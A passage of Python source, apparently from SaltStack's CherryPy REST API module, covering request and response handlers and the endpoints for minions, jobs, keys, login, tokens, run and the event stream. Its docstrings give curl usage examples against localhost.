def hypermedia_handler(*args, **kwargs):
'''
Determine the best output format based on the Accept header, execute the
regular handler, and transform the output to the request content type (even
if it's an error).
:param args: Pass args through to the main handler
:param kwargs: Pass kwargs through to the main handler
'''
# Execute the real handler. Handle or pass-through any errors we know how
# to handle (auth & HTTP errors). Reformat any errors we don't know how to
# handle as a data structure.
try:
cherrypy.response.processors = dict(ct_out_map)
ret = cherrypy.serving.request._hypermedia_inner_handler(*args, **kwargs)
except (salt.exceptions.AuthenticationError,
salt.exceptions.AuthorizationError,
salt.exceptions.EauthAuthenticationError,
salt.exceptions.TokenAuthenticationError):
raise cherrypy.HTTPError(401)
except salt.exceptions.SaltInvocationError:
raise cherrypy.HTTPError(400)
except (salt.exceptions.SaltDaemonNotRunning,
salt.exceptions.SaltReqTimeoutError) as exc:
raise cherrypy.HTTPError(503, exc.strerror)
except salt.exceptions.SaltClientTimeout:
raise cherrypy.HTTPError(504)
except cherrypy.CherryPyException:
raise
except Exception as exc:
        # The TimeoutError exception class was removed in CherryPy 12.0.0, but
        # we still check for TimeoutError and handle it in CherryPy < 12.
        # The check was moved down from the SaltClientTimeout except clause
        # because a one-line if statement there throws a BaseException
        # inheritance TypeError.
if hasattr(cherrypy, 'TimeoutError') and isinstance(exc, cherrypy.TimeoutError):
raise cherrypy.HTTPError(504)
import traceback
logger.debug("Error while processing request for: %s",
cherrypy.request.path_info,
exc_info=True)
cherrypy.response.status = 500
ret = {
'status': cherrypy.response.status,
            'return': '{0}'.format(traceback.format_exc())
if cherrypy.config['debug']
else "An unexpected error occurred"}
# Raises 406 if requested content-type is not supported
best = cherrypy.lib.cptools.accept([i for (i, _) in ct_out_map])
# Transform the output from the handler into the requested output format
cherrypy.response.headers['Content-Type'] = best
out = cherrypy.response.processors[best]
try:
response = out(ret)
if six.PY3:
response = salt.utils.stringutils.to_bytes(response)
return response
except Exception:
msg = 'Could not serialize the return data from Salt.'
logger.debug(msg, exc_info=True)
raise cherrypy.HTTPError(500, msg)
def hypermedia_out():
'''
Determine the best handler for the requested content type
Wrap the normal handler and transform the output from that handler into the
requested content type
'''
request = cherrypy.serving.request
request._hypermedia_inner_handler = request.handler
# If handler has been explicitly set to None, don't override.
if request.handler is not None:
request.handler = hypermedia_handler
def process_request_body(fn):
'''
A decorator to skip a processor function if process_request_body is False
'''
@functools.wraps(fn)
def wrapped(*args, **kwargs): # pylint: disable=C0111
if cherrypy.request.process_request_body is not False:
fn(*args, **kwargs)
return wrapped
def urlencoded_processor(entity):
'''
Accept x-www-form-urlencoded data (run through CherryPy's formatter)
and reformat it into a Low State data structure.
Since we can't easily represent complicated data structures with
key-value pairs, any more complicated requirements (e.g. compound
commands) must instead be delivered via JSON or YAML.
For example::
.. code-block:: bash
curl -si localhost:8000 -d client=local -d tgt='*' \\
-d fun='test.kwarg' -d arg='one=1' -d arg='two=2'
:param entity: raw POST data
'''
# First call out to CherryPy's default processor
cherrypy._cpreqbody.process_urlencoded(entity)
cherrypy.serving.request.unserialized_data = entity.params
cherrypy.serving.request.raw_body = ''
@process_request_body
def json_processor(entity):
'''
Unserialize raw POST data in JSON format to a Python data structure.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
del contents
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid JSON document')
cherrypy.serving.request.raw_body = body
@process_request_body
def yaml_processor(entity):
'''
Unserialize raw POST data in YAML format to a Python data structure.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.yaml.safe_load(body)
except ValueError:
raise cherrypy.HTTPError(400, 'Invalid YAML document')
cherrypy.serving.request.raw_body = body
@process_request_body
def text_processor(entity):
'''
Attempt to unserialize plain text as JSON
Some large services still send JSON with a text/plain Content-Type. Those
services are bad and should feel bad.
:param entity: raw POST data
'''
if six.PY2:
body = entity.fp.read()
else:
# https://github.com/cherrypy/cherrypy/pull/1572
contents = BytesIO()
body = entity.fp.read(fp_out=contents)
contents.seek(0)
body = salt.utils.stringutils.to_unicode(contents.read())
try:
cherrypy.serving.request.unserialized_data = salt.utils.json.loads(body)
except ValueError:
cherrypy.serving.request.unserialized_data = body
cherrypy.serving.request.raw_body = body
def hypermedia_in():
'''
Unserialize POST/PUT data of a specified Content-Type.
The following custom processors all are intended to format Low State data
and will place that data structure into the request object.
:raises HTTPError: if the request contains a Content-Type that we do not
have a processor for
'''
# Be liberal in what you accept
ct_in_map = {
'application/x-www-form-urlencoded': urlencoded_processor,
'application/json': json_processor,
'application/x-yaml': yaml_processor,
'text/yaml': yaml_processor,
'text/plain': text_processor,
}
# Do not process the body for POST requests that have specified no content
# or have not specified Content-Length
if (cherrypy.request.method.upper() == 'POST'
and cherrypy.request.headers.get('Content-Length', '0') == '0'):
cherrypy.request.process_request_body = False
cherrypy.request.unserialized_data = None
cherrypy.request.body.processors.clear()
cherrypy.request.body.default_proc = cherrypy.HTTPError(
406, 'Content type not supported')
cherrypy.request.body.processors = ct_in_map
def lowdata_fmt():
'''
Validate and format lowdata from incoming unserialized request data
This tool requires that the hypermedia_in tool has already been run.
'''
if cherrypy.request.method.upper() != 'POST':
return
data = cherrypy.request.unserialized_data
# if the data was sent as urlencoded, we need to make it a list.
# this is a very forgiving implementation as different clients set different
# headers for form encoded data (including charset or something similar)
if data and isinstance(data, collections.Mapping):
# Make the 'arg' param a list if not already
if 'arg' in data and not isinstance(data['arg'], list):
data['arg'] = [data['arg']]
# Finally, make a Low State and put it in request
cherrypy.request.lowstate = [data]
else:
cherrypy.serving.request.lowstate = data
tools_config = {
'on_start_resource': [
('html_override', html_override_tool),
('salt_token', salt_token_tool),
],
'before_request_body': [
('cors_tool', cors_tool),
('salt_auth', salt_auth_tool),
('hypermedia_in', hypermedia_in),
],
'before_handler': [
('lowdata_fmt', lowdata_fmt),
('hypermedia_out', hypermedia_out),
('salt_ip_verify', salt_ip_verify_tool),
],
}
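# Register each function above as a CherryPy tool at its hook point; the
# priority of (50 + idx) preserves the declaration order within each hook.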
for hook, tool_list in tools_config.items():
for idx, tool_config in enumerate(tool_list):
tool_name, tool_fn = tool_config
setattr(cherrypy.tools, tool_name, cherrypy.Tool(
hook, tool_fn, priority=(50 + idx)))
###############################################################################
class LowDataAdapter(object):
'''
The primary entry point to Salt's REST API
'''
exposed = True
_cp_config = {
'tools.salt_token.on': True,
'tools.sessions.on': True,
'tools.sessions.timeout': 60 * 10, # 10 hours
# 'tools.autovary.on': True,
'tools.hypermedia_out.on': True,
'tools.hypermedia_in.on': True,
'tools.lowdata_fmt.on': True,
'tools.salt_ip_verify.on': True,
}
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.apiopts = cherrypy.config['apiopts']
self.api = salt.netapi.NetapiClient(self.opts)
def exec_lowstate(self, client=None, token=None):
'''
Pull a Low State data structure from request and execute the low-data
chunks through Salt. The low-data chunks will be updated to include the
authorization token for the current session.
'''
lowstate = cherrypy.request.lowstate
# Release the session lock before executing any potentially
# long-running Salt commands. This allows different threads to execute
# Salt commands concurrently without blocking.
if cherrypy.request.config.get('tools.sessions.on', False):
cherrypy.session.release_lock()
        # If the lowstate loaded isn't a list, let's notify the client
if not isinstance(lowstate, list):
raise cherrypy.HTTPError(400, 'Lowstates must be a list')
# Make any requested additions or modifications to each lowstate, then
# execute each one and yield the result.
for chunk in lowstate:
if token:
chunk['token'] = token
if 'token' in chunk:
# Make sure that auth token is hex
try:
int(chunk['token'], 16)
except (TypeError, ValueError):
raise cherrypy.HTTPError(401, 'Invalid token')
if client:
chunk['client'] = client
# Make any 'arg' params a list if not already.
# This is largely to fix a deficiency in the urlencoded format.
if 'arg' in chunk and not isinstance(chunk['arg'], list):
chunk['arg'] = [chunk['arg']]
ret = self.api.run(chunk)
# Sometimes Salt gives us a return and sometimes an iterator
if isinstance(ret, collections.Iterator):
for i in ret:
yield i
else:
yield ret
@cherrypy.config(**{'tools.sessions.on': False})
def GET(self):
'''
An explanation of the API with links of where to go next
.. http:get:: /
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000
.. code-block:: text
GET / HTTP/1.1
Host: localhost:8000
Accept: application/json
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
'''
return {
'return': "Welcome",
'clients': salt.netapi.CLIENTS,
}
@cherrypy.tools.salt_token()
@cherrypy.tools.salt_auth()
def POST(self, **kwargs):
'''
Send one or more Salt commands in the request body
.. http:post:: /
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
:term:`lowstate` data describing Salt commands must be sent in the
request body.
**Example request:**
.. code-block:: bash
curl -sSik https://localhost:8000 \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-H "Content-type: application/json" \\
-d '[{"client": "local", "tgt": "*", "fun": "test.ping"}]'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
X-Auth-Token: d40d1e1e
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 200
Allow: GET, HEAD, POST
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
'''
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token')))
}
class Minions(LowDataAdapter):
'''
Convenience URLs for working with minions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def GET(self, mid=None):
'''
A convenience URL for getting lists of minions or getting minion
details
.. http:get:: /minions/(mid)
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/minions/ms-3
.. code-block:: text
GET /minions/ms-3 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 129005
Content-Type: application/x-yaml
return:
- ms-3:
grains.items:
...
'''
cherrypy.request.lowstate = [{
'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
}]
return {
'return': list(self.exec_lowstate(
token=cherrypy.session.get('token'))),
}
def POST(self, **kwargs):
'''
Start an execution command and immediately return the job id
.. http:post:: /minions
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
Lowstate data describing Salt commands must be sent in the request
body. The ``client`` option will be set to
:py:meth:`~salt.client.LocalClient.local_async`.
**Example request:**
.. code-block:: bash
curl -sSi localhost:8000/minions \\
-b ~/cookies.txt \\
-H "Accept: application/x-yaml" \\
-d '[{"tgt": "*", "fun": "status.diskusage"}]'
.. code-block:: text
POST /minions HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Type: application/json
tgt=*&fun=status.diskusage
**Example response:**
.. code-block:: text
HTTP/1.1 202 Accepted
Content-Length: 86
Content-Type: application/x-yaml
return:
- jid: '20130603122505459265'
minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
_links:
jobs:
- href: /jobs/20130603122505459265
'''
job_data = list(self.exec_lowstate(client='local_async',
token=cherrypy.session.get('token')))
cherrypy.response.status = 202
return {
'return': job_data,
'_links': {
'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
for i in job_data if i],
},
}
class Jobs(LowDataAdapter):
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
})
def GET(self, jid=None, timeout=''):
'''
A convenience URL for getting lists of previously run jobs or getting
the return from a single job
.. http:get:: /jobs/(jid)
List jobs or show a single job from the job cache.
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: text
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: text
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
'''
lowstate = {'client': 'runner'}
if jid:
lowstate.update({'fun': 'jobs.list_job', 'jid': jid})
else:
lowstate.update({'fun': 'jobs.list_jobs'})
cherrypy.request.lowstate = [lowstate]
job_ret_info = list(self.exec_lowstate(
token=cherrypy.session.get('token')))
ret = {}
if jid:
ret['info'] = [job_ret_info[0]]
minion_ret = {}
returns = job_ret_info[0].get('Result')
for minion in returns:
if u'return' in returns[minion]:
minion_ret[minion] = returns[minion].get(u'return')
else:
minion_ret[minion] = returns[minion].get('return')
ret['return'] = [minion_ret]
else:
ret['return'] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
'''
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
'''
def GET(self, mid=None):
'''
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: text
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: text
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
'''
if mid:
lowstate = [{
'client': 'wheel',
'fun': 'key.finger',
'match': mid,
}]
else:
lowstate = [{
'client': 'wheel',
'fun': 'key.list_all',
}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get('token'))
return {'return': next(result, {}).get('data', {}).get('return', {})}
@cherrypy.config(**{'tools.hypermedia_out.on': False, 'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
Easily generate keys for a minion and auto-accept the new key
        Accepts all the same parameters as the :py:func:`key.gen_accept
        <salt.wheel.key.gen_accept>` wheel function.
.. note:: A note about ``curl``
Avoid using the ``-i`` flag or HTTP headers will be written and
produce an invalid tar file.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: text
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
'''
lowstate = cherrypy.request.lowstate
lowstate[0].update({
'client': 'wheel',
'fun': 'key.gen_accept',
})
if 'mid' in lowstate[0]:
lowstate[0]['id_'] = lowstate[0].pop('mid')
result = self.exec_lowstate()
ret = next(result, {}).get('data', {}).get('return', {})
pub_key = ret.get('pub', '')
pub_key_file = tarfile.TarInfo('minion.pub')
pub_key_file.size = len(pub_key)
priv_key = ret.get('priv', '')
priv_key_file = tarfile.TarInfo('minion.pem')
priv_key_file.size = len(priv_key)
fileobj = BytesIO()
tarball = tarfile.open(fileobj=fileobj, mode='w')
if six.PY3:
pub_key = pub_key.encode(__salt_system_encoding__)
priv_key = priv_key.encode(__salt_system_encoding__)
tarball.addfile(pub_key_file, BytesIO(pub_key))
tarball.addfile(priv_key_file, BytesIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(lowstate[0]['id_'])
headers['Content-Type'] = 'application/x-tar'
headers['Content-Length'] = len(fileobj.getvalue())
headers['Cache-Control'] = 'no-cache'
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
'''
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
'''
def __init__(self, *args, **kwargs):
super(Login, self).__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
'''
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: text
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: text/html
'''
cherrypy.response.headers['WWW-Authenticate'] = 'Session'
return {
'status': cherrypy.response.status,
'return': "Please log in",
}
def POST(self, **kwargs):
'''
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
'''
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning(
'Salt Master is not available.')
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get('username', None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if 'token' not in token:
raise cherrypy.HTTPError(401,
'Could not authenticate using provided credentials')
cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
cherrypy.session['token'] = token['token']
cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})
if token['eauth'] == 'django' and '^model' in eauth:
perms = token['auth_list']
else:
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token['name'], [])
perms.extend(eauth.get('*', []))
if 'groups' in token and token['groups']:
user_groups = set(token['groups'])
eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')])
for group in user_groups & eauth_groups:
perms.extend(eauth['{0}%'.format(group)])
if not perms:
logger.debug("Eauth permission list not found.")
except Exception:
logger.debug(
"Configuration for external_auth malformed for eauth '%s', "
"and user '%s'.", token.get('eauth'), token.get('name'),
exc_info=True
)
perms = None
return {'return': [{
'token': cherrypy.session.id,
'expire': token['expire'],
'start': token['start'],
'user': token['name'],
'eauth': token['eauth'],
'perms': perms or {},
}]}
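# --- Hedged usage sketch (not part of the Salt source): the login flow described
# above, driven from Python with the third-party ``requests`` library instead of
# curl. The URL, credentials, and eauth backend are illustrative assumptions.
def _example_login_with_requests():
    import requests  # assumption: installed in the client environment
    resp = requests.post(
        'http://localhost:8000/login',
        json={'username': 'saltuser', 'password': 'saltuser', 'eauth': 'auto'},
        headers={'Accept': 'application/json'})
    resp.raise_for_status()
    # The session token appears both in the X-Auth-Token header and the body.
    return resp.json()['return'][0]['token']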
class Logout(LowDataAdapter):
'''
Class to remove or invalidate sessions
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.salt_auth.on': True,
'tools.lowdata_fmt.on': False,
})
def POST(self):
'''
Destroy the currently active session and expire the session cookie
'''
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {'return': "Your token has been cleared"}
class Token(LowDataAdapter):
'''
Generate a Salt token from eauth credentials
Wraps functionality in the :py:mod:`auth Runner <salt.runners.auth>`.
.. versionadded:: 2017.7.0
'''
@cherrypy.config(**{'tools.sessions.on': False})
def POST(self, **kwargs):
r'''
.. http:post:: /token
Generate a Salt eauth token
:status 200: |200|
:status 400: |400|
:status 401: |401|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/token \
-H 'Content-type: application/json' \
-d '{
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}'
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
[{
"start": 1494987445.528182,
"token": "e72ca1655d05...",
"expire": 1495030645.528183,
"name": "saltdev",
"eauth": "auto"
}]
'''
for creds in cherrypy.request.lowstate:
try:
creds.update({
'client': 'runner',
'fun': 'auth.mk_token',
'kwarg': {
'username': creds['username'],
'password': creds['password'],
'eauth': creds['eauth'],
},
})
except KeyError:
raise cherrypy.HTTPError(400,
'Require "username", "password", and "eauth" params')
return list(self.exec_lowstate())
class Run(LowDataAdapter):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
    salt-api does not enforce authorization; Salt's eauth system does that.
Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
**or** ``token`` kwargs that are then checked by the eauth system. The
session mechanism in ``rest_cherrypy`` simply pairs a session with a Salt
eauth token and then passes the ``token`` kwarg in automatically.
If you already have a Salt eauth token, perhaps generated by the
:py:func:`mk_token <salt.runners.auth.mk_token>` function in the Auth
Runner module, then there is no reason to use sessions.
This endpoint accepts either a ``username``, ``password``, ``eauth`` trio,
**or** a ``token`` kwarg and does not make use of sessions at all.
'''
_cp_config = dict(LowDataAdapter._cp_config, **{
'tools.sessions.on': False,
})
def POST(self, **kwargs):
'''
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>` Other than that this URL is identical to the
:py:meth:`root URL (/) <LowDataAdapter.POST>`.
.. http:post:: /run
An array of lowstate data describing Salt commands must be sent in
the request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
**Or** using a Salt Eauth token:
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"token": "<salt eauth token here>"
}]'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
        The /run endpoint can also be used to issue commands using the salt-ssh
subsystem.
When using salt-ssh, eauth credentials should not be supplied. Instead,
authentication should be handled by the SSH layer itself. The use of
the salt-ssh client does not require a salt master to be running.
Instead, only a roster file must be present in the salt configuration
directory.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: text
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
'''
return {
'return': list(self.exec_lowstate()),
}
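# --- Hedged usage sketch (not part of the Salt source): calling /run with a
# pre-made Salt eauth token, mirroring the second curl example above. The URL
# and target are illustrative assumptions.
def _example_run_with_token(salt_eauth_token):
    import requests  # assumption: installed in the client environment
    lowstate = [{
        'client': 'local',
        'tgt': '*',
        'fun': 'test.ping',
        'token': salt_eauth_token,
    }]
    resp = requests.post('http://localhost:8000/run', json=lowstate,
                         headers={'Accept': 'application/json'})
    resp.raise_for_status()
    return resp.json()['return']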
class Events(object):
'''
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
'''
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{
'response.stream': True,
'tools.encode.encoding': 'utf-8',
# Auth handled manually below
'tools.salt_auth.on': False,
'tools.hypermedia_in.on': False,
'tools.hypermedia_out.on': False,
})
def __init__(self):
self.opts = cherrypy.config['saltopts']
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
'''
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
'''
# Make sure that auth token is hex. If it's None, or something other
# than hex, this will raise a ValueError.
try:
int(auth_token, 16)
except (TypeError, ValueError):
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get('token', auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r'''
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: text
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
        clients to only watch for certain tags without having to deserialize the
JSON object each time.
.. code-block:: text
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.log(saltEvent.tag, saltEvent.data);
};
Note, the SSE stream is fast and completely asynchronous and Salt is
very fast. If a job is created using a regular POST request, it is
possible that the job return will be available on the SSE stream before
